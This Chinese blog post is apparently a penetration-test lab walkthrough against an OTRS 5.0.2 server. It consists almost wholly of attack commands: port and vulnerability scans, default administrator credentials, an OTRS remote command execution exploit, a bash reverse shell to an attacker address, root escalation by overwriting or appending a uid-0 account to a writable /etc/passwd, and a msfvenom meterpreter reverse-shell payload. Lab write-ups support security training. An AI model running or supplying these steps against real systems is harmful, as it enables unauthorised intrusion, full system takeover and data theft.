登录
当前位置: 首页 > 工具软件 > OTRS > 使用案例 >

渗透测试实战-OTRS 5.0.x/6.0.x漏洞利用

严书
2023-12-01

nmap -T4 -A -sS -sV -vv --script vuln -p- --open -n -Pn 10.11.1.39 -oX 10.11.1.39.xml 

xsltproc -o 10.11.1.39.html 10.11.1.39.xml 

nikto -h 10.11.1.39 

扫描到/otrs/index.pl 确认版本为5.0.2 

默认用户(root@localhost),密码是OTRs 

搜索漏洞OTRS 5.0.x/6.0.x - Remote Command Execution (1) - Perl webapps Exploit 

利用/usr/bin/bash   -i >& /dev/tcp/10.11.0.243/1234 0>&1 & 反弹shell 

通过linuxprivchecker.py 搜索到/etc/passwd 可写入 

未验证:echo root::0:0:root:/root:/bin/bash > /etc/passwd 直接覆盖也行 

perl -le 'print crypt("password@123","addedsalt")'生成带盐值得密码advwtv/9yU5yQ 

echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash">>/etc/passwd 追加账号密码 

python -c "import pty;pty.spawn('/bin/bash')"   模拟终端 

su test 完成root提权 

生成linux木马反弹:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.0.243 LPORT=4444 -f elf -o /root/payload.elf 

下载重要文件 

find / -perm -u=s -type f 2>/dev/null 查找suid 

 类似资料:

相关阅读

JRE 1.7漏洞防范XSS漏洞?为什么x ==(x = y)与(x = y)== x不同?x * x vs Math.pow(x,2)Java性能python面试题Python2.x和Python3.x的区别

相关文章

字节一面(已凉)-渗透测试工程师具有漏洞的组件美团_暑期实习_测试开发_一面(透心凉)深信服X计划面试时间线实战-Swing实现在线考试项目

相关问答

迁移ApacheCamel2。x、 x到3。x、 xSQL注入漏洞spring boot starter测试1.4.1-使用AssertJ-Core 3.5.x使用X射线云操作测试步骤为什么在('x',)中的'x'比'x'=='x'快?

相关文档

Android 渗透测试学习手册Kali Linux Web 渗透测试秘籍 中文版格式化字符串漏洞利用Cocos2d-x 入门实战 - 微信飞机大战讲解Cocos2d-x 用户手册 v3.x
快捷导航: 新手教程 算法原理 架构设计 Java进阶 数据库进阶 大厂专栏 面试经验 编程笔记 编程问答 所有专题 文档资料 工具软件 电子书籍 小牛导航
在线工具: 房贷计算器 个税计算器 Linux命令查询 Json格式化 正则表达式 颜色转换 AES加解密 SHA1加密 MD5加密 毒鸡汤 字数统计 随机密码生成 进制转换 Base64编解码 励志句子
Copyright © 2019-2024 小牛知识库@xnip.cn. All Rights Reserved.